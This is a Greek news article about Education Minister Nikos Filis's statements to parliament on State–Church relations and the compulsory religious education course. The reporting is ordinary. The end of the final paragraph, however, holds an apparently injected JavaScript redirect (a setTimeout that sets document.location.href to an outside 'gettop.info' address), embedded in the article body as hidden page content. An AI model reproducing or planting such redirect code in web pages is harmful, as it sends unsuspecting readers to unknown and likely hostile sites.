Φίλης: Θέλουμε σχέσεις με την Εκκλησία που αποβλέπουν στο να βγει η Ελλάδα από την κρίση

0
5

 

Για τις σχέσεις με την Εκκλησία αλλά και το μάθημα των Θρησκευτικών μίλησε ο υπουργός Παιδείας Νίκος Φίλης απαντώντας σε ερώτηση του βουλευτή της Δημοκρατικής Συμπαράταξης Δημήτρη Κρεμαστινού, μετά την κρίση που αποσοβήθηκε με τη συνάντηση της Ιερρχίας με τον πρωθυπουργό χθες βράδυ.

Όπως σημείωσε ο κ. Φίλης: «Οι σχέσεις που θέλουμε να έχουμε με την Εκκλησία είναι οι σχέσεις που προσδιορίζονται από το Σύνταγμα και τους νόμους, σχέσεις συνεργασίας, σχέσεις οι οποίες αποβλέπουν στη βελτίωση της χώρας μας, στο να βγει η Ελλάδα από την κρίσηκαι εκεί ο καθένας κρίνεται από τη στάση του. Η πρόσφατη συμπεριφορά της Εκκλησίας, στην περίοδο της κρίσης με το αναπτυγμένο φιλανθρωπικό της έργο είναι ένα σημαντικό στοιχείο που βοηθάει στην κατεύθυνση της συνεργασίας επ ωφελεία του λαού» ενώ για τη χθεσινή συνάντηση σχολίασε:

«Υπάρχει μια προσπάθεια καταλλαγής στις σχέσεις Πολιτείας και Εκκλησίας και η χθεσινή συνάντηση που είχαμε με την αντιπροσωπεία της ιεραρχίας με επικεφαλής τον Μακαριώτατο, βοήθησε σε αυτή την κατεύθυνση, να εξηγηθούν ζητήματα και να αρθούν παρεξηγήσεις» και πρόσθεσε: «Το πρώτο ζήτημα στο οποίο συμφωνήσαμε και συμφωνούμε είναι ότι την ευθύνη για την εκπαίδευση στη χώρα μας την έχει το κράτος με τα αρμόδια όργανά του. Βεβαίως, η Εκκλησία μπορεί να διατυπώνει τις απόψεις της και οφείλουμε να λαμβάνουμε υπόψη τον διάλογο που αναπτύσσεται ευρύτερα γύρω από ζητήματα όπως είναι το μάθημα των θρησκευτικών. Αυτό κάναμε επί μεγάλο διάστημα. Ίσως να μην έφτανε για την Εκκλησία αυτός ο διάλογος. Ποτέ δεν τελειώνει ο διάλογος».

«Θα εφαρμοστούν φέτος τα προγράμματα που έχουν αποφασιστεί στο πλαίσιο των αρμοδιοτήτων της Πολιτείας, θα εφαρμοστούν με υλικό που έχει διανεμηθεί ήδη με τα περυσινά βιβλία, τα οποία αποτελούν πηγές για το μάθημα» επεσήμανε ο κ. Φίλης, ο οποίος, υπογράμμισε ότι και αυτά τα βιβλία είχαν συναντήσει την ισχυρή αντίδραση της εκκλησίας, όταν πρωτοεκδόθηκαν αλλά διδάχθηκαν επί σειρά ετών, διότι η απόφαση για την εκπαίδευση είναι θέμα του κράτους με σεβασμό στις απόψεις της Εκκλησίας.

Είπε επιπλέον ότι θα γίνει η αξιολόγηση φέτος των νέων προγραμμάτων και πριν γραφεί το νέο βιβλίο θα υπάρξει διάλογος με τους εκπαιδευτικούς και με εκκλησιαστικούς φορείς γύρω από τα ζητήματα της εφαρμογής των νέων προγραμμάτων σπουδών. «Πρόθεση της Πολιτείας δεν είναι να δημιουργεί αντιδικίες, δεν είναι να αμφισβητεί τους διακριτούς ρόλους των διαφόρων θεσμών, ιδιαίτερα των κορυφαίων θεσμών όπως είναι η Εκκλησία και η Πολιτεία», είπε και πρόσθεσε ότι το μείζον είναι η βελτίωση της εκπαίδευσης. Σημειώσε: «Πιστεύω ότι αν αφήσουμε στιγμές που δεν βοηθούν, σε αυτή τη συνεννόηση μπορούμε να προχωρήσουμε και να γνωρίζουμε ότι θα είναι προς όφελος των παιδιών και συνολικά προς όφελος της εκπαίδευσης […]. Σεβόμαστε το θρησκευτικό συναίσθημα των πολιτών και αναγνωρίζουμε τον σύνθετο ρόλο της θρησκείας στη ζωή και στις μεταφυσικές ανησυχίες των πολιτών» τόνισε και σημείωσε ότι αυτά είναι ζητήματα κατοχυρωμένα από το Σύνταγμα και επίσης ότι η κυβέρνηση και άλλες κυβερνήσεις με την πολιτική τους αποδεικνύουν ότι τα σέβονται.

Ειδικά για τη θρησκευτική διαπαιδαγώγηση-εκπαίδευση, είπε ότι το Σύνταγμα δεν ομιλεί για χριστιανική, πολύ περισσότερο ορθόδοξη, διαπαιδαγώγηση ως αποστολή του σχολείου. Μιλάει γενικά για την εθνική και θρησκευτική αγωγή, των παιδιών ως αποστολή του σχολείου, τόνισε ο υπουργός και πρόσθεσε ότι αυτό σημαίνει πως το σχολείο προετοιμάζει, όχι πιστούς αλλά πολίτες. «Αυτό έχει μεγάλη σημασία. Και μερικές φορές στον δημόσιο διάλογο ηθελημένα ή αθέλητα παραποιείται αυτή η ρητή συνταγματική διάταξη σχετικά με τους σκοπούς της εκπαίδευσης» τόνισε.

Ο υπουργός Παιδείας είπε ακόμη ότι το υπουργείο θέλει να αναμορφώσει το μάθημα των θρησκευτικών, με ιδιαίτερη βεβαίως έμφαση στον ορθόδοξο πολιτισμό: «Υπάρχουν δεσμεύσεις της Πολιτείας νομικές, εσωτερικές και διεθνείς, που αφορούν την προστασία των θρησκευτικών μειονοτήτων στη χώρα μας. Αυτές ακολουθούμε. Τονίζω πρόκειται για θρησκευτικές μειονότητες. Εκτός αν κάποιος θέλει να αποδώσει άλλο χαρακτηρισμό, στις υφιστάμενες στην Ελλάδα μειονότητες… Με αυτή την έννοια, όταν αναγνωρίζουμε και δίνουμε μάχη, ως ελληνικό κράτος, ότι οι μειονότητες οι συγκεκριμένες, οι μουσουλμάνοι για παράδειγμα στη χώρα μας, είναι θρησκευτικές μειονότητες, είμαστε υποχρεωμένοι να σεβαστούμε την άποψη που έχουν οι συγκεκριμένες μειονότητες για τη διδασκαλία του μαθήματος των θρησκευτικών, και αυτή η διδασκαλία δεν είναι υποχρεωτική, είναι προαιρετική. Εδώ μιλούμε για υποχρεωτικό μάθημα για το σύνολο των πιστών τε και απίστων, για το σύνολο του πληθυσμού, υποχρεωτικό μάθημα θρησκευτικών στα σχολεία». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here